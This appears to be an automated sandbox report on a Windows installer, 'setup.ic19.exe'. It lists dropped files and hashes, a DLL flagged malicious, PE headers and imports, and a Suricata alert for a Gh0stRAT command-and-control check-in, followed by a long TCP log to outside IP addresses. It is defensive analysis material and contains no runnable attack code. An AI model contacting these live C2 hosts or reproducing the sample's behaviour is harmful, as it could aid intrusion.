SHA1:	9009BCF6CB2E4895145C0264D11F941F667AEC51
SHA-256:	0F94A9B9A37372BC211D29165E82A08D71F401B551976DAFFA629BA1EFE540BE
SHA-512:	FA85E760F5BDE1A62A72C84C21A81D91DABDA2E272B4F73AF9B63D6B57A8E4EA9186E23D801D54D21D3CA9C1F943A53C7F5751F592CBC8A8AF721E415C582F8E
Malicious:	false
Preview:	6hcspwumB8HHkW3muz7tCmZWviXAJiyr*/&....t..............t...........

C:\Users\user\AppData\Roaming\hccutils.dll

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3664432
Entropy (8bit):	7.965099932850337
Encrypted:	false
SSDEEP:	49152:WwApIj2UwOmhJfOkNqZbPxrH4jP/A7+Lc37acfmWd/5gPzpuOEeMzj+TALICmwd/:Wrmj3EA6qNJ7F7yTWnRYEeMzj7BxMx4
MD5:	156F5AFB716F0FF4C7D43DCEAC078494
SHA1:	1E1D949A37C9DE2A3BB40D1191C2114CA53CB423
SHA-256:	578E99ABBB629BEBB43824BE99CB0B633E9EB564655D70D31885FEB981D5BD31
SHA-512:	BCB1CE9F724691CD5535391294CF4DB05A6003FE65923AE445CF031FEFEBEF9E224874701A93802F1501F7B30AEBFF117B62095E7594C0238A0949FF56C5DD50
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..._..f.........." ...'............G.J.......................................Y...........`...........................................+.s...XVL.P.....Y.a...0aY..;....7.."....Y.L...................................._Y.@.............!.X............................text... ........................... ..`.rdata..v....0......................@..@.data... ...........................@....pdata..x...........................@..@_RDATA....... ......................@..@.C,D........0...................... ..`.N)b....`.....!.....................@....nsH......7..."...7.................`..h.reloc..L.....Y.......7.............@..@.rsrc...a.....Y.......7.............@..@................................................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	297
Entropy (8bit):	4.423882556409726
Encrypted:	false
SSDEEP:	3:ri9K0/ldl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl8/lP92lU8IAuUWKznlg:ri9TDTwPYtyjtOsNaG4oiBP
MD5:	718FCC78B661A763144FB63C2C57AF8E
SHA1:	E5D4464FFD31065526F44E33435405382CF4893C
SHA-256:	808482142FEBF29680A2430EFCAA91C3EACA39943FA76FCE7F56D82A5F35A71A
SHA-512:	5F9A004E72B10AB37F33E64DCFE9D77554E1FC6F1FD31E1ADEBDCC8611F0E30A061CD714D4DB8A11102E3295821C29263C67D4BE2C73094B82286FC161D69399
Malicious:	false
Preview:	..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....RS\|%...m.dQ.C.

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.23261855111017
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setup.ic19.exe
File size:	350'144 bytes
MD5:	e1c81c53c0fcd8301a0a51cdb1669ccc
SHA1:	5c8a9f629a0b9399fd829cc8eeb9c31c7bf6c173
SHA256:	811ba62844f5aac8675ffb5ab6d2166097231beeba58ce46be708fa06257e0bd
SHA512:	eab99cfd6b38678c2b155956447e364de0762fd6b91ffd39c7b28364e215c878f7204934b2ec2e21052f68bce1f842222f02e4071c80ee916522091f8cdfd9f4
SSDEEP:	6144:xz6XBxULZRje/1JT1MAOHc8WqcfWWHOUbXhfTIEyoDu0212KRC:xz6XBxqZRje/1TMAODJUbXxTDS0W2IC
TLSH:	BC747E267B9E4064D5269534CC53DBE6D9723C183F2543CB2228BA6AEF3B7D2B935301
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........F.v...v...v.......v.......v.......v.......v.......v...v...w.......v...$...v.......v..Rich.v..........PE..d......N..........#

File Icon


Icon Hash:	db93929a929292da

Static PE Info

General

Entrypoint:	0x140014c5c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4EE51C9B [Sun Dec 11 21:11:55 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	87831df3f581ca6cc7dfeadcfedd2ac4

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F1C010B0AA4h
dec eax
add esp, 28h
jmp 00007F1C01096E09h
int3
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
mov eax, ecx
dec eax
neg ecx
dec eax
test eax, 00000007h
je 00007F1C010AAA31h
nop
mov dl, byte ptr [eax]
dec eax
inc eax
test dl, dl
je 00007F1C010AAA81h
test al, 07h
jne 00007F1C010AAA15h
dec ecx
mov eax, FEFEFEFFh

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[ASM] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[C++] VS2008 SP1 build 30729
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29364	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44000	0x17e00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x42000	0x1a88	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x53a00	0x17c0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x820	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x217b2	0x21800	d454ca4029abecfaa5cafedee1006fab	False	0.5201871501865671	data	6.297391412625387	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x7c92	0x7e00	0e62527cf9c5eb3d37e1c2f30afe0833	False	0.3599950396825397	data	4.944909887782271	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b000	0x162f0	0x10c00	0c3be6d5e0e4e8eac03159f1b0a09bb6	False	0.48714435634328357	data	5.663844845257141	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x42000	0x1a88	0x1c00	cc55044fb81c54d4533ceb3f099448c4	False	0.4633091517857143	data	5.148915931954734	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x44000	0x17e00	0x17e00	5a921baacef9b0298a2ab0b2114087fe	False	0.2668418684554974	data	5.316256454044995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x44a48	0xbff	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.7538261152718984
RT_ICON	0x45648	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.40202702702702703
RT_ICON	0x45770	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.47760115606936415
RT_ICON	0x45cd8	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	English	United States	0.4426605504587156
RT_ICON	0x46040	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.1989247311827957
RT_ICON	0x46328	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.6069494584837545
RT_ICON	0x46bd0	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	English	United States	0.34228395061728395
RT_ICON	0x47878	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.10426829268292682
RT_ICON	0x47ee0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.43523454157782515
RT_ICON	0x48d88	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	English	United States	0.2348691384950927
RT_ICON	0x4aa30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.4222972972972973
RT_ICON	0x4ab58	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.444364161849711
RT_ICON	0x4b0c0	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	English	United States	0.4954128440366973
RT_ICON	0x4b428	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.44060283687943264
RT_ICON	0x4b890	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.20295698924731181
RT_ICON	0x4bb78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.641245487364621
RT_ICON	0x4c420	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	English	United States	0.38858024691358023
RT_ICON	0x4d0c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3236397748592871
RT_ICON	0x4e170	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.10548780487804878
RT_ICON	0x4e7d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.42937100213219614
RT_ICON	0x4f680	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	English	United States	0.26717557251908397
RT_ICON	0x51328	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.2236514522821577
RT_ICON	0x538d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	United States	0.40202702702702703
RT_ICON	0x539f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.6134393063583815
RT_ICON	0x53f60	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 768	English	United States	0.2786697247706422
RT_ICON	0x542c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colors	English	United States	0.1989247311827957
RT_ICON	0x545b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.5266245487364621
RT_ICON	0x54e58	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3072	English	United States	0.2345679012345679
RT_ICON	0x55b00	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152, 16 important colors	English	United States	0.10609756097560975
RT_ICON	0x56168	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.3296908315565032
RT_ICON	0x57010	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 6912	English	United States	0.14844601962922574
RT_MENU	0x58cb8	0x114	Matlab v4 mat-file (little endian) &, numeric, rows 5505168, columns 4259922, imaginary	English	United States	0.5072463768115942
RT_DIALOG	0x58dcc	0xd8	data	English	United States	0.6990740740740741
RT_DIALOG	0x58ea4	0x176	data	English	United States	0.6122994652406417
RT_DIALOG	0x5901c	0x28c	data	English	United States	0.5276073619631901
RT_DIALOG	0x592a8	0xda	data	English	United States	0.7018348623853211
RT_DIALOG	0x59384	0x688	data	English	United States	0.4007177033492823
RT_DIALOG	0x59a0c	0x394	data	English	United States	0.425764192139738
RT_STRING	0x59da0	0x344	data	English	United States	0.4700956937799043
RT_STRING	0x5a0e4	0x9fe	data	English	United States	0.22947615324472245
RT_STRING	0x5aae4	0x286	data	English	United States	0.4582043343653251
RT_STRING	0x5ad6c	0x36e	data	English	United States	0.4202733485193622
RT_STRING	0x5b0dc	0x214	data	English	United States	0.4323308270676692
RT_STRING	0x5b2f0	0x238	data	English	United States	0.3380281690140845
RT_STRING	0x5b528	0xae	data	English	United States	0.6206896551724138
RT_GROUP_ICON	0x5b5d8	0x14	data	English	United States	1.05
RT_GROUP_ICON	0x5b5ec	0xae	data	English	United States	0.5689655172413793
RT_GROUP_ICON	0x5b69c	0x84	data	English	United States	0.6439393939393939
RT_GROUP_ICON	0x5b720	0x84	data	English	United States	0.6439393939393939
RT_VERSION	0x5b7a4	0x3ec	data	English	United States	0.4362549800796813
RT_MANIFEST	0x5bb90	0x270	ASCII text, with CRLF line terminators	English	United States	0.5176282051282052

Imports

DLL	Import
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
MPR.dll	WNetGetUniversalNameW, WNetGetResourceInformationW
KERNEL32.dll	lstrcpyW, lstrcatW, GlobalUnlock, GlobalLock, GlobalAlloc, GetLastError, CloseHandle, ResetEvent, WaitForMultipleObjects, Sleep, SetEvent, OpenEventW, CreateEventW, ResumeThread, DuplicateHandle, GetCurrentProcess, MultiByteToWideChar, WideCharToMultiByte, FreeLibrary, GetProcAddress, LoadLibraryW, WriteFile, CreateFileW, GetTempPathW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetWindowsDirectoryW, CreateFileMappingW, SetLastError, GetCurrentThreadId, lstrcmpiW, lstrcmpW, lstrcpynW, LoadLibraryA, GetSystemDirectoryA, GetComputerNameW, FormatMessageW, GetModuleHandleW, HeapFree, HeapAlloc, GetProcessHeap, OpenProcess, GetCurrentProcessId, CreateProcessW, GetModuleFileNameW, LoadLibraryExW, GetVersionExW, SetErrorMode, GetSystemDirectoryW, GetStartupInfoA, GetFileType, SetHandleCount, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, FlsAlloc, FlsFree, FlsSetValue, FlsGetValue, DecodePointer, EncodePointer, GetModuleFileNameA, GetStdHandle, ExitProcess, HeapCreate, HeapSetInformation, GetStartupInfoW, RtlCaptureContext, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, RtlPcToFileHeader, RaiseException, RtlUnwindEx, RtlLookupFunctionEntry, CreateThread, ExitThread, LeaveCriticalSection, GetSystemTimeAsFileTime, EnterCriticalSection, InitializeCriticalSectionAndSpinCount, HeapReAlloc, lstrlenW, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, HeapSize, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, VirtualAlloc, LocalFree
USER32.dll	UpdateWindow, GetDC, ReleaseDC, LoadCursorW, RegisterClassExW, CreateWindowExW, LoadImageW, GetWindowLongPtrW, DestroyWindow, PostQuitMessage, RegisterWindowMessageW, IsIconic, FindWindowW, InvalidateRect, LoadMenuW, GetSubMenu, EnableMenuItem, GetCursorPos, TrackPopupMenu, CreateDialogParamW, DefWindowProcW, DestroyMenu, SetThreadDesktop, GetMessageW, TranslateMessage, DispatchMessageW, OpenInputDesktop, GetThreadDesktop, ShowScrollBar, IsWindowEnabled, SetForegroundWindow, OpenDesktopW, GetUserObjectInformationW, CloseDesktop, EnumDesktopWindows, GetForegroundWindow, MessageBoxW, SetFocus, IsDlgButtonChecked, CheckDlgButton, EnableWindow, DialogBoxParamW, IsWindow, SendDlgItemMessageW, SendMessageW, CopyRect, GetSystemMetrics, SystemParametersInfoW, MoveWindow, MessageBeep, DrawTextW, FlashWindow, EndDialog, BeginPaint, GetClientRect, GetDlgItem, GetWindowRect, ScreenToClient, DrawIcon, EndPaint, PostMessageW, KillTimer, ShowWindow, LoadIconW, LoadStringW, SetDlgItemTextW, SetTimer, SetWindowPos, SetWindowLongPtrW, OpenClipboard, EmptyClipboard, GetDlgItemTextW, SetClipboardData, CloseClipboard, wsprintfW, IsWindowVisible, RegisterClipboardFormatW, SetWindowTextW, ExitWindowsEx
GDI32.dll	CreateFontW, DeleteObject, SelectObject, SetBkColor, SetBkMode, CreateSolidBrush, GetDeviceCaps, GetStockObject, SetTextColor
COMDLG32.dll	GetSaveFileNameW
ADVAPI32.dll	RegCreateKeyExW, OpenSCManagerW, OpenServiceW, CloseServiceHandle, QueryServiceStatus, RegDeleteValueW, RegisterEventSourceW, ReportEventW, OpenProcessToken, GetTokenInformation, LookupAccountSidW, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegSetValueExW, RegOpenKeyW, GetUserNameW
SHELL32.dll	ShellExecuteExW, Shell_NotifyIconW, DragQueryFileW, ShellExecuteW
ole32.dll	RevokeDragDrop, RegisterDragDrop, OleInitialize, CoInitialize, CoTaskMemFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T04:28:59.059603+0200	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.4	49752	47.76.31.57	9098	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 04:27:18.740242004 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:18.740348101 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:18.740434885 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:18.756021023 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:18.756055117 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.308468103 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.308562994 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.309978962 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.310059071 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.397398949 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.397428989 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.397840023 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.397912979 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.400234938 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.447402954 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.732425928 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.732486963 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.732517958 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.732541084 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.732580900 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.732580900 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.747770071 CEST	49731	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.747801065 CEST	443	49731	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.949867964 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.949896097 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:20.949980021 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.950190067 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:20.950202942 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.219146967 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.219213963 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.219995022 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.220005989 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.220166922 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.220170975 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.590667963 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.590692043 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.590740919 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.590825081 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.590848923 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.590903997 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.590934038 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.591725111 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.591793060 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.828619003 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.828788996 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.828893900 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.828963041 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.828979015 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.829030037 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.829879045 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.829935074 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.830091000 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.830142021 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.830842018 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.830904007 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:22.830920935 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:22.830971003 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.066988945 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.067090988 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.067105055 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.067152977 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.067609072 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.067662001 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.067682981 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.067733049 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.068478107 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.068531036 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.068542004 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.068553925 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.068573952 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.068598032 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.069300890 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.069349051 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.069452047 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.069499969 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.070259094 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.070312977 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.070313931 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.070327044 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.070350885 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.070372105 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.071075916 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.071125031 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.071180105 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.071233988 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.071965933 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.072010040 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.072027922 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.072077990 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.307176113 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.307226896 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.307264090 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.307264090 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.307286978 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.307317972 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.307329893 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.307338953 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.307358027 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.307367086 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.307394028 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.307399035 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.307410002 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.307437897 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.307683945 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.307735920 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.308042049 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.308095932 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.308279037 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.308329105 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.308372021 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.308410883 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.308429956 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.308435917 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.308456898 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.308485031 CEST	49736	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:23.308901072 CEST	443	49736	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:23.308960915 CEST	49736	443	192.168.2.4	39.103.20.76
